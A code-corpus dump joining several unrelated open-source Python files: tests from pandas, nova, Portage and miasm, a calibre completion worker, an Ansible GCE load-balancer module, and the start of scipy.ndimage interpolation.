pytest.raises(ValueError,
lambda: ts.sort_values(ascending='foobar'))
# inplace=True
ts = self.ts.copy()
ts.sort_values(ascending=False, inplace=True)
tm.assert_series_equal(ts, self.ts.sort_values(ascending=False))
tm.assert_index_equal(ts.index,
self.ts.sort_values(ascending=False).index)
# GH 5856/5853
# Series.sort_values operating on a view
df = DataFrame(np.random.randn(10, 4))
s = df.iloc[:, 0]
def f():
s.sort_values(inplace=True)
pytest.raises(ValueError, f)
def test_sort_index(self):
rindex = list(self.ts.index)
random.shuffle(rindex)
random_order = self.ts.reindex(rindex)
sorted_series = random_order.sort_index()
assert_series_equal(sorted_series, self.ts)
# descending
sorted_series = random_order.sort_index(ascending=False)
assert_series_equal(sorted_series,
self.ts.reindex(self.ts.index[::-1]))
# compat on level
sorted_series = random_order.sort_index(level=0)
assert_series_equal(sorted_series, self.ts)
# compat on axis
sorted_series = random_order.sort_index(axis=0)
assert_series_equal(sorted_series, self.ts)
pytest.raises(ValueError, lambda: random_order.sort_values(axis=1))
sorted_series = random_order.sort_index(level=0, axis=0)
assert_series_equal(sorted_series, self.ts)
pytest.raises(ValueError,
lambda: random_order.sort_index(level=0, axis=1))
def test_sort_index_inplace(self):
# For #11402
rindex = list(self.ts.index)
random.shuffle(rindex)
# descending
random_order = self.ts.reindex(rindex)
result = random_order.sort_index(ascending=False, inplace=True)
assert result is None
tm.assert_series_equal(random_order, self.ts.reindex(
self.ts.index[::-1]))
# ascending
random_order = self.ts.reindex(rindex)
result = random_order.sort_index(ascending=True, inplace=True)
assert result is None
tm.assert_series_equal(random_order, self.ts)
@pytest.mark.parametrize("level", ['A', 0]) # GH 21052
def test_sort_index_multiindex(self, level):
mi = MultiIndex.from_tuples([[1, 1, 3], [1, 1, 1]], names=list('ABC'))
s = Series([1, 2], mi)
backwards = s.iloc[[1, 0]]
# implicit sort_remaining=True
res = s.sort_index(level=level)
assert_series_equal(backwards, res)
# GH13496
# sort has no effect without remaining lvls
res = s.sort_index(level=level, sort_remaining=False)
assert_series_equal(s, res)
def test_sort_index_kind(self):
# GH #14444 & #13589: Add support for sort algo choosing
series = Series(index=[3, 2, 1, 4, 3])
expected_series = Series(index=[1, 2, 3, 3, 4])
index_sorted_series = series.sort_index(kind='mergesort')
assert_series_equal(expected_series, index_sorted_series)
index_sorted_series = series.sort_index(kind='quicksort')
assert_series_equal(expected_series, index_sorted_series)
index_sorted_series = series.sort_index(kind='heapsort')
assert_series_equal(expected_series, index_sorted_series)
def test_sort_index_na_position(self):
series = Series(index=[3, 2, 1, 4, 3, np.nan])
expected_series_first = Series(index=[np.nan, 1, 2, 3, 3, 4])
index_sorted_series = series.sort_index(na_position='first')
assert_series_equal(expected_series_first, index_sorted_series)
expected_series_last = Series(index=[1, 2, 3, 3, 4, np.nan])
index_sorted_series = series.sort_index(na_position='last')
assert_series_equal(expected_series_last, index_sorted_series)
def test_sort_index_intervals(self):
s = Series([np.nan, 1, 2, 3], IntervalIndex.from_arrays(
[0, 1, 2, 3],
[1, 2, 3, 4]))
result = s.sort_index()
expected = s
assert_series_equal(result, expected)
result = s.sort_index(ascending=False)
expected = Series([3, 2, 1, np.nan], IntervalIndex.from_arrays(
[3, 2, 1, 0],
[4, 3, 2, 1]))
assert_series_equal(result, expected)
def test_sort_values_categorical(self):
c = Categorical(["a", "b", "b", "a"], ordered=False)
cat = Series(c.copy())
# sort in the categories order
expected = Series(
Categorical(["a", "a", "b", "b"],
ordered=False), index=[0, 3, 1, 2])
result = cat.sort_values()
tm.assert_series_equal(result, expected)
cat = Series(Categorical(["a", "c", "b", "d"], ordered=True))
res = cat.sort_values()
exp = np.array(["a", "b", "c", "d"], dtype=np.object_)
tm.assert_numpy_array_equal(res.__array__(), exp)
cat = Series(Categorical(["a", "c", "b", "d"], categories=[
"a", "b", "c", "d"], ordered=True))
res = cat.sort_values()
exp = np.array(["a", "b", "c", "d"], dtype=np.object_)
tm.assert_numpy_array_equal(res.__array__(), exp)
res = cat.sort_values(ascending=False)
exp = np.array(["d", "c", "b", "a"], dtype=np.object_)
tm.assert_numpy_array_equal(res.__array__(), exp)
raw_cat1 = Categorical(["a", "b", "c", "d"],
categories=["a", "b", "c", "d"], ordered=False)
raw_cat2 = Categorical(["a", "b", "c", "d"],
categories=["d", "c", "b", "a"], ordered=True)
s = ["a", "b", "c", "d"]
df = DataFrame({"unsort": raw_cat1,
"sort": raw_cat2,
"string": s,
"values": [1, 2, 3, 4]})
# Cats must be sorted in a dataframe
res = df.sort_values(by=["string"], ascending=False)
exp = np.array(["d", "c", "b", "a"], dtype=np.object_)
tm.assert_numpy_array_equal(res["sort"].values.__array__(), exp)
assert res["sort"].dtype == "category"
res = df.sort_values(by=["sort"], ascending=False)
exp = df.sort_values(by=["string"], ascending=True)
tm.assert_series_equal(res["values"], exp["values"])
assert res["sort"].dtype == "category"
assert res["unsort"].dtype == "category"
# unordered cat, but we allow this
df.sort_values(by=["unsort"], ascending=False)
# multi-columns sort
# GH 7848
df = DataFrame({"id": [6, 5, 4, 3, 2, 1],
"raw_grade": ['a', 'b', 'b', 'a', 'a', 'e']})
df["grade"] = Categorical(df["raw_grade"], ordered=True)
df['grade'] = df['grade'].cat.set_categories(['b', 'e', 'a'])
# sorts 'grade' according to the order of the categories
result = df.sort_values(by=['grade'])
expected = df.iloc[[1, 2, 5, 0, 3, 4]]
tm.assert_frame_equal(result, expected)
# multi
result = df.sort_values(by=['grade', 'id'])
expected = df.iloc[[2, 1, 5, 4, 3, 0]]
tm.assert_frame_equal(result, expected)
| bsd-3-clause | -8,371,191,273,254,857,000 | 36.084942 | 78 | 0.568246 | false |
citrix-openstack-build/nova | nova/tests/api/openstack/compute/contrib/test_certificates.py | 11 | 2810 | # Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
from nova.api.openstack.compute.contrib import certificates
from nova import context
from nova.openstack.common import rpc
from nova import test
from nova.tests.api.openstack import fakes
def fake_get_root_cert(context, *args, **kwargs):
return 'fakeroot'
def fake_create_cert(context, *args, **kwargs):
return 'fakepk', 'fakecert'
class CertificatesTest(test.NoDBTestCase):
def setUp(self):
super(CertificatesTest, self).setUp()
self.context = context.RequestContext('fake', 'fake')
self.controller = certificates.CertificatesController()
def test_translate_certificate_view(self):
pk, cert = fake_create_cert(self.context)
view = certificates._translate_certificate_view(cert, pk)
self.assertEqual(view['data'], cert)
self.assertEqual(view['private_key'], pk)
def test_certificates_show_root(self):
self.stubs.Set(rpc, 'call', fake_get_root_cert)
req = fakes.HTTPRequest.blank('/v2/fake/os-certificates/root')
res_dict = self.controller.show(req, 'root')
cert = fake_get_root_cert(self.context)
response = {'certificate': {'data': cert, 'private_key': None}}
self.assertEqual(res_dict, response)
def test_certificates_create_certificate(self):
self.stubs.Set(rpc, 'call', fake_create_cert)
req = fakes.HTTPRequest.blank('/v2/fake/os-certificates/')
res_dict = self.controller.create(req)
pk, cert = fake_create_cert(self.context)
response = {'certificate': {'data': cert, 'private_key': pk}}
self.assertEqual(res_dict, response)
class CertificatesSerializerTest(test.NoDBTestCase):
def test_index_serializer(self):
serializer = certificates.CertificateTemplate()
text = serializer.serialize(dict(
certificate=dict(
data='fakecert',
private_key='fakepk'),
))
tree = etree.fromstring(text)
self.assertEqual('certificate', tree.tag)
self.assertEqual('fakepk', tree.get('private_key'))
self.assertEqual('fakecert', tree.get('data'))
| apache-2.0 | -1,903,622,883,617,369,000 | 35.493506 | 78 | 0.672242 | false |
ns950/calibre | src/calibre/gui2/tweak_book/completion/worker.py | 14 | 7340 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
import cPickle, os, sys
from threading import Thread, Event, Lock
from Queue import Queue
from contextlib import closing
from collections import namedtuple
from calibre.constants import iswindows
from calibre.gui2.tweak_book.completion.basic import Request
from calibre.gui2.tweak_book.completion.utils import DataError
from calibre.utils.ipc import eintr_retry_call
COMPLETION_REQUEST = 'completion request'
CLEAR_REQUEST = 'clear request'
class CompletionWorker(Thread):
daemon = True
def __init__(self, result_callback=lambda x:x, worker_entry_point='main'):
Thread.__init__(self)
self.worker_entry_point = worker_entry_point
self.start()
self.main_queue = Queue()
self.result_callback = result_callback
self.reap_thread = None
self.shutting_down = False
self.connected = Event()
self.current_completion_request = None
self.latest_completion_request_id = None
self.request_count = 0
self.lock = Lock()
def launch_worker_process(self):
from calibre.utils.ipc.server import create_listener
from calibre.utils.ipc.pool import start_worker
self.worker_process = p = start_worker(
'from {0} import run_main, {1}; run_main({1})'.format(self.__class__.__module__, self.worker_entry_point))
auth_key = os.urandom(32)
address, self.listener = create_listener(auth_key)
eintr_retry_call(p.stdin.write, cPickle.dumps((address, auth_key), -1))
p.stdin.flush(), p.stdin.close()
self.control_conn = eintr_retry_call(self.listener.accept)
self.data_conn = eintr_retry_call(self.listener.accept)
self.data_thread = t = Thread(name='CWData', target=self.handle_data_requests)
t.daemon = True
t.start()
self.connected.set()
def send(self, data, conn=None):
conn = conn or self.control_conn
try:
eintr_retry_call(conn.send, data)
except:
if not self.shutting_down:
raise
def recv(self, conn=None):
conn = conn or self.control_conn
try:
return eintr_retry_call(conn.recv)
except:
if not self.shutting_down:
raise
def wait_for_connection(self, timeout=None):
self.connected.wait(timeout)
def handle_data_requests(self):
from calibre.gui2.tweak_book.completion.basic import handle_data_request
while True:
try:
req = self.recv(self.data_conn)
except EOFError:
break
except Exception:
import traceback
traceback.print_exc()
break
if req is None or self.shutting_down:
break
result, tb = handle_data_request(req)
try:
self.send((result, tb), self.data_conn)
except EOFError:
break
except Exception:
import traceback
traceback.print_exc()
break
def run(self):
self.launch_worker_process()
while True:
obj = self.main_queue.get()
if obj is None:
break
req_type, req_data = obj
try:
if req_type is COMPLETION_REQUEST:
with self.lock:
if self.current_completion_request is not None:
ccr, self.current_completion_request = self.current_completion_request, None
self.send_completion_request(ccr)
elif req_type is CLEAR_REQUEST:
self.send(req_data)
except EOFError:
break
except Exception:
import traceback
traceback.print_exc()
def send_completion_request(self, request):
self.send(request)
result = self.recv()
if result.request_id == self.latest_completion_request_id:
try:
self.result_callback(result)
except Exception:
import traceback
traceback.print_exc()
def clear_caches(self, cache_type=None):
self.main_queue.put((CLEAR_REQUEST, Request(None, 'clear_caches', cache_type, None)))
def queue_completion(self, request_id, completion_type, completion_data, query=None):
with self.lock:
self.current_completion_request = Request(request_id, completion_type, completion_data, query)
self.latest_completion_request_id = self.current_completion_request.id
self.main_queue.put((COMPLETION_REQUEST, None))
def shutdown(self):
self.shutting_down = True
self.main_queue.put(None)
for conn in (getattr(self, 'control_conn', None), getattr(self, 'data_conn', None)):
try:
conn.close()
except Exception:
pass
p = self.worker_process
if p.poll() is None:
self.worker_process.terminate()
t = self.reap_thread = Thread(target=p.wait)
t.daemon = True
t.start()
def join(self, timeout=0.2):
if self.reap_thread is not None:
self.reap_thread.join(timeout)
if not iswindows and self.worker_process.returncode is None:
self.worker_process.kill()
return self.worker_process.returncode
_completion_worker = None
def completion_worker():
global _completion_worker
if _completion_worker is None:
_completion_worker = CompletionWorker()
return _completion_worker
def run_main(func):
from multiprocessing.connection import Client
address, key = cPickle.loads(eintr_retry_call(sys.stdin.read))
with closing(Client(address, authkey=key)) as control_conn, closing(Client(address, authkey=key)) as data_conn:
func(control_conn, data_conn)
Result = namedtuple('Result', 'request_id ans traceback query')
def main(control_conn, data_conn):
from calibre.gui2.tweak_book.completion.basic import handle_control_request
while True:
try:
request = eintr_retry_call(control_conn.recv)
except EOFError:
break
if request is None:
break
try:
ans, tb = handle_control_request(request, data_conn), None
except DataError as err:
ans, tb = None, err.traceback()
except Exception:
import traceback
ans, tb = None, traceback.format_exc()
if request.id is not None:
result = Result(request.id, ans, tb, request.query)
try:
eintr_retry_call(control_conn.send, result)
except EOFError:
break
def test_main(control_conn, data_conn):
obj = control_conn.recv()
control_conn.send(obj)
def test():
w = CompletionWorker(worker_entry_point='test_main')
w.wait_for_connection()
w.send('Hello World!')
print (w.recv())
w.shutdown(), w.join()
| gpl-3.0 | -4,758,162,357,571,931,000 | 34.288462 | 118 | 0.594823 | false |
cloudnull/ansible-modules-core | cloud/google/gce_lb.py | 9 | 12216 | #!/usr/bin/python
# Copyright 2013 Google Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: gce_lb
version_added: "1.5"
short_description: create/destroy GCE load-balancer resources
description:
- This module can create and destroy Google Compute Engine C(loadbalancer)
and C(httphealthcheck) resources. The primary LB resource is the
C(load_balancer) resource and the health check parameters are all
prefixed with I(httphealthcheck).
The full documentation for Google Compute Engine load balancing is at
U(https://developers.google.com/compute/docs/load-balancing/). However,
the ansible module simplifies the configuration by following the
libcloud model.
Full install/configuration instructions for the gce* modules can
be found in the comments of ansible/test/gce_tests.py.
options:
httphealthcheck_name:
description:
- the name identifier for the HTTP health check
required: false
default: null
httphealthcheck_port:
description:
- the TCP port to use for HTTP health checking
required: false
default: 80
httphealthcheck_path:
description:
- the url path to use for HTTP health checking
required: false
default: "/"
httphealthcheck_interval:
description:
- the duration in seconds between each health check request
required: false
default: 5
httphealthcheck_timeout:
description:
- the timeout in seconds before a request is considered a failed check
required: false
default: 5
httphealthcheck_unhealthy_count:
description:
- number of consecutive failed checks before marking a node unhealthy
required: false
default: 2
httphealthcheck_healthy_count:
description:
- number of consecutive successful checks before marking a node healthy
required: false
default: 2
httphealthcheck_host:
description:
- host header to pass through on HTTP check requests
required: false
default: null
name:
description:
- name of the load-balancer resource
required: false
default: null
protocol:
description:
- the protocol used for the load-balancer packet forwarding, tcp or udp
required: false
default: "tcp"
choices: ['tcp', 'udp']
region:
description:
- the GCE region where the load-balancer is defined
required: false
external_ip:
description:
- the external static IPv4 (or auto-assigned) address for the LB
required: false
default: null
port_range:
description:
      - the port (range) to forward, e.g. 80 or 8000-8888; defaults to all ports
required: false
default: null
members:
description:
      - a list of zone/nodename pairs, e.g. ['us-central1-a/www-a', ...]
required: false
aliases: ['nodes']
state:
description:
- desired state of the LB
default: "present"
choices: ["active", "present", "absent", "deleted"]
aliases: []
service_account_email:
version_added: "1.6"
description:
- service account email
required: false
default: null
aliases: []
pem_file:
version_added: "1.6"
description:
- path to the pem file associated with the service account email
required: false
default: null
aliases: []
project_id:
version_added: "1.6"
description:
- your GCE project ID
required: false
default: null
aliases: []
requirements:
- "python >= 2.6"
- "apache-libcloud >= 0.13.3"
author: Eric Johnson <[email protected]>
'''
EXAMPLES = '''
# Simple example of creating a new LB, adding members, and a health check
- local_action:
module: gce_lb
name: testlb
region: us-central1
members: ["us-central1-a/www-a", "us-central1-b/www-b"]
httphealthcheck_name: hc
httphealthcheck_port: 80
httphealthcheck_path: "/up"
'''
try:
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
from libcloud.loadbalancer.types import Provider as Provider_lb
from libcloud.loadbalancer.providers import get_driver as get_driver_lb
from libcloud.common.google import GoogleBaseError, QuotaExceededError, \
ResourceExistsError, ResourceNotFoundError
_ = Provider.GCE
HAS_LIBCLOUD = True
except ImportError:
HAS_LIBCLOUD = False
def main():
module = AnsibleModule(
argument_spec = dict(
httphealthcheck_name = dict(),
httphealthcheck_port = dict(default=80),
httphealthcheck_path = dict(default='/'),
httphealthcheck_interval = dict(default=5),
httphealthcheck_timeout = dict(default=5),
httphealthcheck_unhealthy_count = dict(default=2),
httphealthcheck_healthy_count = dict(default=2),
httphealthcheck_host = dict(),
name = dict(),
protocol = dict(default='tcp'),
region = dict(),
external_ip = dict(),
port_range = dict(),
members = dict(type='list'),
state = dict(default='present'),
service_account_email = dict(),
pem_file = dict(),
project_id = dict(),
)
)
if not HAS_LIBCLOUD:
module.fail_json(msg='libcloud with GCE support (0.13.3+) required for this module.')
gce = gce_connect(module)
httphealthcheck_name = module.params.get('httphealthcheck_name')
httphealthcheck_port = module.params.get('httphealthcheck_port')
httphealthcheck_path = module.params.get('httphealthcheck_path')
httphealthcheck_interval = module.params.get('httphealthcheck_interval')
httphealthcheck_timeout = module.params.get('httphealthcheck_timeout')
httphealthcheck_unhealthy_count = \
module.params.get('httphealthcheck_unhealthy_count')
httphealthcheck_healthy_count = \
module.params.get('httphealthcheck_healthy_count')
httphealthcheck_host = module.params.get('httphealthcheck_host')
name = module.params.get('name')
protocol = module.params.get('protocol')
region = module.params.get('region')
external_ip = module.params.get('external_ip')
port_range = module.params.get('port_range')
members = module.params.get('members')
state = module.params.get('state')
try:
gcelb = get_driver_lb(Provider_lb.GCE)(gce_driver=gce)
gcelb.connection.user_agent_append("%s/%s" % (
USER_AGENT_PRODUCT, USER_AGENT_VERSION))
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
changed = False
json_output = {'name': name, 'state': state}
if not name and not httphealthcheck_name:
module.fail_json(msg='Nothing to do, please specify a "name" ' + \
'or "httphealthcheck_name" parameter', changed=False)
if state in ['active', 'present']:
# first, create the httphealthcheck if requested
hc = None
if httphealthcheck_name:
json_output['httphealthcheck_name'] = httphealthcheck_name
try:
hc = gcelb.ex_create_healthcheck(httphealthcheck_name,
host=httphealthcheck_host, path=httphealthcheck_path,
port=httphealthcheck_port,
interval=httphealthcheck_interval,
timeout=httphealthcheck_timeout,
unhealthy_threshold=httphealthcheck_unhealthy_count,
healthy_threshold=httphealthcheck_healthy_count)
changed = True
except ResourceExistsError:
hc = gce.ex_get_healthcheck(httphealthcheck_name)
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
if hc is not None:
json_output['httphealthcheck_host'] = hc.extra['host']
json_output['httphealthcheck_path'] = hc.path
json_output['httphealthcheck_port'] = hc.port
json_output['httphealthcheck_interval'] = hc.interval
json_output['httphealthcheck_timeout'] = hc.timeout
json_output['httphealthcheck_unhealthy_count'] = \
hc.unhealthy_threshold
json_output['httphealthcheck_healthy_count'] = \
hc.healthy_threshold
# create the forwarding rule (and target pool under the hood)
lb = None
if name:
if not region:
module.fail_json(msg='Missing required region name',
changed=False)
nodes = []
output_nodes = []
json_output['name'] = name
# members is a python list of 'zone/inst' strings
if members:
for node in members:
try:
zone, node_name = node.split('/')
nodes.append(gce.ex_get_node(node_name, zone))
output_nodes.append(node)
except:
# skip nodes that are badly formatted or don't exist
pass
try:
if hc is not None:
lb = gcelb.create_balancer(name, port_range, protocol,
None, nodes, ex_region=region, ex_healthchecks=[hc],
ex_address=external_ip)
else:
lb = gcelb.create_balancer(name, port_range, protocol,
None, nodes, ex_region=region, ex_address=external_ip)
changed = True
except ResourceExistsError:
lb = gcelb.get_balancer(name)
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
if lb is not None:
json_output['members'] = output_nodes
json_output['protocol'] = protocol
json_output['region'] = region
json_output['external_ip'] = lb.ip
json_output['port_range'] = lb.port
hc_names = []
if 'healthchecks' in lb.extra:
for hc in lb.extra['healthchecks']:
hc_names.append(hc.name)
json_output['httphealthchecks'] = hc_names
if state in ['absent', 'deleted']:
# first, delete the load balancer (forwarding rule and target pool)
# if specified.
if name:
json_output['name'] = name
try:
lb = gcelb.get_balancer(name)
gcelb.destroy_balancer(lb)
changed = True
except ResourceNotFoundError:
pass
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
# destroy the health check if specified
if httphealthcheck_name:
json_output['httphealthcheck_name'] = httphealthcheck_name
try:
hc = gce.ex_get_healthcheck(httphealthcheck_name)
gce.ex_destroy_healthcheck(hc)
changed = True
except ResourceNotFoundError:
pass
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
json_output['changed'] = changed
module.exit_json(**json_output)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.gce import *
if __name__ == '__main__':
main()
| gpl-3.0 | 517,273,460,745,364,200 | 35.357143 | 93 | 0.615914 | false |
nullishzero/Portage | pym/portage/tests/unicode/test_string_format.py | 11 | 3238 | # Copyright 2010-2014 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
from __future__ import unicode_literals
import sys
from portage import _encodings, _unicode_encode
from portage.exception import PortageException
from portage.tests import TestCase
from _emerge.DependencyArg import DependencyArg
from _emerge.UseFlagDisplay import UseFlagDisplay
if sys.hexversion >= 0x3000000:
# pylint: disable=W0622
basestring = str
STR_IS_UNICODE = sys.hexversion >= 0x3000000
class StringFormatTestCase(TestCase):
"""
	Test that string formatting works correctly in the current interpreter,
which may be either python2 or python3.
"""
# We need unicode_literals in order to get some unicode test strings
# in a way that works in both python2 and python3.
unicode_strings = (
'\u2018',
'\u2019',
)
def testDependencyArg(self):
self.assertEqual(_encodings['content'], 'utf_8')
for arg_unicode in self.unicode_strings:
arg_bytes = _unicode_encode(arg_unicode, encoding=_encodings['content'])
dependency_arg = DependencyArg(arg=arg_unicode)
# Use unicode_literals for unicode format string so that
# __unicode__() is called in Python 2.
formatted_str = "%s" % (dependency_arg,)
self.assertEqual(formatted_str, arg_unicode)
if STR_IS_UNICODE:
# Test the __str__ method which returns unicode in python3
formatted_str = "%s" % (dependency_arg,)
self.assertEqual(formatted_str, arg_unicode)
else:
# Test the __str__ method which returns encoded bytes in python2
formatted_bytes = b"%s" % (dependency_arg,)
self.assertEqual(formatted_bytes, arg_bytes)
def testPortageException(self):
self.assertEqual(_encodings['content'], 'utf_8')
for arg_unicode in self.unicode_strings:
arg_bytes = _unicode_encode(arg_unicode, encoding=_encodings['content'])
e = PortageException(arg_unicode)
# Use unicode_literals for unicode format string so that
# __unicode__() is called in Python 2.
formatted_str = "%s" % (e,)
self.assertEqual(formatted_str, arg_unicode)
if STR_IS_UNICODE:
# Test the __str__ method which returns unicode in python3
formatted_str = "%s" % (e,)
self.assertEqual(formatted_str, arg_unicode)
else:
# Test the __str__ method which returns encoded bytes in python2
formatted_bytes = b"%s" % (e,)
self.assertEqual(formatted_bytes, arg_bytes)
def testUseFlagDisplay(self):
self.assertEqual(_encodings['content'], 'utf_8')
for enabled in (True, False):
for forced in (True, False):
for arg_unicode in self.unicode_strings:
e = UseFlagDisplay(arg_unicode, enabled, forced)
# Use unicode_literals for unicode format string so that
# __unicode__() is called in Python 2.
formatted_str = "%s" % (e,)
self.assertEqual(isinstance(formatted_str, basestring), True)
if STR_IS_UNICODE:
# Test the __str__ method which returns unicode in python3
formatted_str = "%s" % (e,)
self.assertEqual(isinstance(formatted_str, str), True)
else:
# Test the __str__ method which returns encoded bytes in python2
formatted_bytes = b"%s" % (e,)
self.assertEqual(isinstance(formatted_bytes, bytes), True)
| gpl-2.0 | 3,093,918,245,920,799,000 | 28.981481 | 75 | 0.701359 | false |
dynm/miasm | test/arch/aarch64/unit/asm_test.py | 5 | 1790 | #! /usr/bin/env python
import sys
import os
from miasm2.core.cpu import parse_ast
from miasm2.arch.aarch64.arch import mn_aarch64, base_expr, variable
from miasm2.core import parse_asm
from miasm2.expression.expression import *
from miasm2.core import asmbloc
from elfesteem.strpatchwork import StrPatchwork
from miasm2.analysis.machine import Machine
from miasm2.jitter.csts import *
from pdb import pm
filename = os.environ.get('PYTHONSTARTUP')
if filename and os.path.isfile(filename):
execfile(filename)
reg_and_id = dict(mn_aarch64.regs.all_regs_ids_byname)
class Asm_Test(object):
def __init__(self):
self.myjit = Machine("aarch64l").jitter()
self.myjit.init_stack()
self.myjit.jit.log_regs = False
self.myjit.jit.log_mn = False
def __call__(self):
self.asm()
self.run()
self.check()
def asm(self):
blocs, symbol_pool = parse_asm.parse_txt(mn_aarch64, 'l', self.TXT,
symbol_pool = self.myjit.ir_arch.symbol_pool)
# fix shellcode addr
symbol_pool.set_offset(symbol_pool.getby_name("main"), 0x0)
s = StrPatchwork()
patches = asmbloc.asm_resolve_final(mn_aarch64, blocs[0], symbol_pool)
for offset, raw in patches.items():
s[offset] = raw
self.assembly = str(s)
def run(self):
run_addr = 0
self.myjit.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, self.assembly)
self.myjit.cpu.LR = 0x1337beef
self.myjit.add_breakpoint(0x1337beef, lambda x:False)
self.myjit.init_run(run_addr)
self.myjit.continue_run()
assert(self.myjit.pc == 0x1337beef)
def check(self):
raise NotImplementedError('abstract method')
| gpl-2.0 | -7,165,890,506,159,838,000 | 26.96875 | 94 | 0.643017 | false |
piyush0609/scipy | scipy/ndimage/interpolation.py | 36 | 26949 | # Copyright (C) 2003-2005 Peter J. Verveer
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, print_function, absolute_import
import math
import numpy
from . import _ni_support
from . import _nd_image
import warnings
__all__ = ['spline_filter1d', 'spline_filter', 'geometric_transform',
'map_coordinates', 'affine_transform', 'shift', 'zoom', 'rotate']
def _extend_mode_to_code(mode):
mode = _ni_support._extend_mode_to_code(mode)
return mode
def spline_filter1d(input, order=3, axis=-1, output=numpy.float64):
"""
Calculates a one-dimensional spline filter along the given axis.
The lines of the array along the given axis are filtered by a
spline filter. The order of the spline must be >= 2 and <= 5.
Parameters
----------
input : array_like
The input array.
order : int, optional
The order of the spline, default is 3.
axis : int, optional
The axis along which the spline filter is applied. Default is the last
axis.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array. Default is `numpy.float64`.
Returns
-------
spline_filter1d : ndarray or None
The filtered input. If `output` is given as a parameter, None is
returned.
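    Examples
    --------
    A small usage sketch; orders 0 and 1 simply copy the data, while
    higher orders return B-spline coefficients of the same shape:
    >>> from scipy import ndimage
    >>> ndimage.spline_filter1d(np.arange(4.), order=1)
    array([ 0.,  1.,  2.,  3.])
    >>> ndimage.spline_filter1d(np.arange(4.), order=3).shape
    (4,)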
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
if order in [0, 1]:
output[...] = numpy.array(input)
else:
axis = _ni_support._check_axis(axis, input.ndim)
_nd_image.spline_filter1d(input, order, axis, output)
return return_value
def spline_filter(input, order=3, output=numpy.float64):
"""
Multi-dimensional spline filter.
For more details, see `spline_filter1d`.
See Also
--------
spline_filter1d
Notes
-----
The multi-dimensional filter is implemented as a sequence of
one-dimensional spline filters. The intermediate arrays are stored
in the same data type as the output. Therefore, for output types
with a limited precision, the results may be imprecise because
intermediate results may be stored with insufficient precision.
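    Examples
    --------
    A minimal sketch; the returned coefficient array has the same shape
    as the input (the order must be between 2 and 5 for this function):
    >>> from scipy import ndimage
    >>> a = np.arange(12.).reshape((4, 3))
    >>> ndimage.spline_filter(a, order=3).shape
    (4, 3)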
"""
if order < 2 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
if order not in [0, 1] and input.ndim > 0:
for axis in range(input.ndim):
spline_filter1d(input, order, axis, output=output)
input = output
else:
output[...] = input[...]
return return_value
def _geometric_transform(input, mapping, coordinates, matrix, offset, output,
order, mode, cval, extra_arguments, extra_keywords):
"""
Wrapper around _nd_image.geometric_transform to work around
endianness issues
"""
_nd_image.geometric_transform(
input, mapping, coordinates, matrix, offset, output,
order, mode, cval, extra_arguments, extra_keywords)
if output is not None and not output.dtype.isnative:
output.byteswap(True)
return output
def geometric_transform(input, mapping, output_shape=None,
output=None, order=3,
mode='constant', cval=0.0, prefilter=True,
extra_arguments=(), extra_keywords={}):
"""
Apply an arbritrary geometric transform.
The given mapping function is used to find, for each point in the
output, the corresponding coordinates in the input. The value of the
input at those coordinates is determined by spline interpolation of
the requested order.
